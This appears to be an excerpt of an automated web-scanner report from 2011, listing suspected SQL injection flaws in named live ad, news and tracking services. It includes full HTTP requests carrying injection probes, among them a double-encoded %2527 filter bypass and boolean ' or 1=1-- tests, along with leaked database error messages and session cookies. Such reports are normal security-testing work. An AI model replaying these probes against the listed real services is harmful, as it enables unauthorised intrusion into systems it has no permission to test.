The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the region request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2%2527&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:00:09 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3029

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
20clinic%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Malibu Luxury Rehab";
google_ad.line2 = "Integrated Holistic \x26amp; Cutting Edge";
google_ad.line3 = "Unique Rehab. Exceptional Success.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fco
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2%2527%2527&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:00:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3639

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:09:16 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2983

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
520professionals%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:09:17 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3278

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...

1.13. http://pandora.cnet.com/api/rest/ddaImageHandler/index.php [fieldNum parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://pandora.cnet.com
Path:   /api/rest/ddaImageHandler/index.php

Issue detail

The fieldNum parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fieldNum parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /api/rest/ddaImageHandler/index.php?fieldNum=3'&fuseaction=download&keyval=2n540drqg0i_2 HTTP/1.1
Host: pandora.cnet.com
Proxy-Connection: keep-alive
Referer: http://i.i.com.com/cnwk.1d/Ads/7074/11/moneywatch_carousel_300x250.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:02:57 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=662e4b70fb17ef7022023939ad53f4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 394
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AS bin_data, img_binType3\' AS filetype FROM dda2_preview WHERE keyval='2n540' at line 1

<br>
...[SNIP]...

1.14. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/SiteLifeProxy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20467713'%20or%201%3d1--%20 and 20467713'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d1--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: public, max-age=86400
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:07:23 GMT
Last-Modified: Mon, 14 Feb 2011 10:07:23 GMT
ETag: -726392143
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Set-Cookie: anonId=a1694d2b-4620-4b12-92ae-a550aea084e5; domain=desmoinesregister.com; expires=Tue, 14-Feb-2012 14:54:14 GMT; path=/
Date: Mon, 14 Feb 2011 14:54:14 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out d
...[SNIP]...

Request 2

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d2--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4081535073; path=/
Cache-Control: public, max-age=84015
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:34:37 GMT
Last-Modified: Mon, 14 Feb 2011 10:34:37 GMT
ETag: -1742467064
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm11l3pluckcom
Date: Mon, 14 Feb 2011 14:54:15 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out debug information through alert()
this.debug = false;

// used to track the id of the handler expecting the results from the immediately preceeding method invocation
// this is used only for test
...[SNIP]...

1.15. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d1--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d2--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP; ASPSESSIONIDQQQBQRQB=LGNJFCKDCOEOIDPLMBHLJKED; ASPSESSIONIDCSRCARRC=HJMBHMGANPCOKHHIKGIJKLNJ

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 15:09:58 GMT
Expires: Mon, 14 Feb 2011 15:09:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQABSCD=FLMPGLGANBKJFNJEGIJHBAHE; path=/
X-Powered-By: ASP.NET
Content-Length: 788
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = c0260, @campaignId = 6468, @syndicationOutletId
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
